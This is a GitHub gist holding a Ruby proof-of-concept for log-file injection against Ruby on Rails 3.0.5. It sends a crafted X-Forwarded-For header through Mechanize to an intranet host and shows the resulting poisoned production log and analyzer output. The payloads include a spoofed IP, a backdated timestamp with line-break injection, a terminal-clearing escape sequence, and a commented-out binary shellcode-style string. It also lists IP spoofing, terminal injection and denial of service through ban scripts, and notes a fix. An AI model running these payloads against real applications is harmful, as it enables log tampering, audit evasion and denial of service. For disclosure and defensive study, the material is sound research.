Created
March 13, 2011 17:11
-
-
Save dryaf/868268 to your computer and use it in GitHub Desktop.
(only on intranet webapps) 3.0.5
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Encoding: UTF-8 | |
| # | |
| # Log-File-Injection - Ruby on Rails 3.05 | |
| # possibilities: | |
| # - possible date back attacks (tried with request-log-analyzer: worked but teaser_check_warnings) | |
| # - ip spoofing | |
| # - terminal injection | |
| # - binary log-injections | |
| # - DOS if ip is used with an iptables-ban-script | |
| # | |
| # !! works only on intranet apps !! | |
| # | |
| # Fix: | |
| # validate request.remote_ip until they fix it | |
| # ----------------------- | |
| # jimmybandit.com | |
| # http://webservsec.blogspot.com | |
| require 'rubygems' | |
| require 'mechanize' | |
| require 'iconv' | |
| ip = "99.99.99.99 " | |
| clear_code = %x{clear} | |
| payload = ip + "at Mon Jan 01 00:00:00 +1000 2009\x0D\0x0A" # date back attack incl. ipspoofing | |
| # payload = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" binarypayload is also possible | |
| payload = ip + clear_code # clears the terminal if log is watched via tail or cat | |
| a = Mechanize.new | |
| a.pre_connect_hooks << lambda { |p| p[:request]['X-Forwarded-For'] = payload } | |
| page = a.get('http://192.168.1.21/people') | |
| # results | |
| =begin | |
| ################################ | |
| production.log: | |
| ################################ | |
| Started GET "/people" for 192.168.1.21 at Mon Jan 01 00:00:00 +1000 2009 at Sun Mar 13 17:47:47 +0100 2011 | |
| Processing by PeopleController#index as | |
| Rendered people/index.html.erb within layouts/application (24.4ms) | |
| Completed 200 OK in 63ms (Views: 32.9ms | ActiveRecord: 3.6ms) | |
| ################################ | |
| request-log-analyzer: | |
| ################################ | |
| web@debian:~/testapp/log$ request-log-analyzer production.log | |
| Request-log-analyzer, by Willem van Bergen and Bart ten Brinke - version 1.10.0 | |
| Website: http://railsdoctors.com | |
| production.log: 100% [==========] Time: 00:00:00 | |
| Request summary | |
| ━━━━━━━━━━━━━━━━━━━━━━━ | |
| Parsed lines: 14 | |
| Skipped lines: 0 <------- | |
| Parsed requests: 7 <------- | |
| Skipped requests: 0 | |
| Warnings: teaser_check_failed: 7 | |
| First request: 2009-01-01 00:00:12 | |
| Last request: 2009-01-01 00:00:12 | |
| Total time analyzed: 0 days | |
| Request distribution per hour | |
| ━━━━━━━━━━━━━━━━━━━━━━━━━━━━ | |
| 0:00 ┃ 7 hits/day ┃ ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ | |
| 1:00 ┃ 0 hits/day ┃ | |
| ... | |
| =end | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment